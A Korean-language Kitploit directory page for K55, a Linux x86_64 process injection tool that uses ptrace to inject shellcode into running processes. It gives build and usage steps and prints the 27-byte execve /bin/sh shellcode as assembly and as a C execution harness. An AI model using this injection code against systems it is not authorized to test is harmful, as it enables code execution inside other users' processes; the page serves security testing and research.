Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
K55 — Linux x86_64 프로세스 인젝션 유틸리티 | Kitploit
도구/GitHubGitHub/josh0xa/k55
ExploitationShellcodeRed Teaming
GitHubjosh0xa/k55

K55

Linux x86_64 프로세스 인젝션 유틸리티

저장소 보기
59135년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

K55 - Linux x86_64 프로세스 인젝션 유틸리티 (C++14)

lisence

K55 소개

(발음: "케이 피프티 파이브")
K55 페이로드 인젝션 도구는 x86_64 셸코드 페이로드를 실행 중인 프로세스에 주입하는 데 사용됩니다. 이 유틸리티는 최신 C++11 기술과 ptrace()와 같은 전통적인 C 리눅스 함수를 함께 사용하여 개발되었습니다. 대상 프로세스에서 실행되는 셸코드는 27바이트이며, 대상의 주소 공간 내에서 /bin/sh (bash 셸)을 실행합니다. 향후에는 사용자가 명령줄 인수를 통해 자신의 셸코드를 입력할 수 있도록 할 예정입니다.

설치

  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55
  3. chmod +x build-install.sh
  4. ./build-install.sh

K55 사용법

사용법: ./K55 <프로세스-이름>

  • 프로세스-이름은 r-xp 또는 execstack 권한을 가진 모든 리눅스 프로세스일 수 있습니다.

테스트

테스트 1) 한 터미널 (K55/ 디렉터리)에서 다음을 실행합니다: ./k55_example_process/k55_test_process
테스트 2) 다른 터미널에서 인젝터를 실행합니다: sudo ./K55 k55_test_process

K55 작동 모습

  • K55 셸코드 인젝터가 (루트로) 실행될 때 k55_test_process에서 셸이 생성됩니다.

지정된 프로세스에 주입

대상에서 생성된 셸

제한 사항

당연히, ptrace(PTRACE_POKETEXT...) 호출은 가장 은밀한 방법은 아닙니다. 따라서 일부 애플리케이션은 K55의 효과를 제한할 수 있습니다. 하지만 보안 테스트를 위해 대상 애플리케이션에서 execstack을 활성화해야 합니다. 예를 들어 gdb에서 테스트하는 경우, 인젝션 전에 다음 명령을 실행하십시오: sudo execstack -s /usr/bin/gdb. 배포판의 패키지 관리자에서 execstack을 설치하십시오. Arch Linux 사용자의 경우 AUR에서 execstack을 찾을 수 있습니다.

셸 페이로드 제작

참고: 다음은 데모입니다. 페이로드 문자열은 이미 K55에 하드코딩되어 있습니다.

페이로드의 어셈블리 구현 (shell-storm에서 인용 (리디렉션))

root@kitploit:~
main:
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    push rsp
    pop rsi
    mov al, 0x3b
    syscall

페이로드의 C 구현

root@kitploit:~
#include <stdio.h>
#include <string.h>

// 어셈블리 코드의 셸코드 분해
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}

참고 자료

http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097

라이선스

MIT 라이선스
Copyright (c) Josh Schiavone

도구 다운로드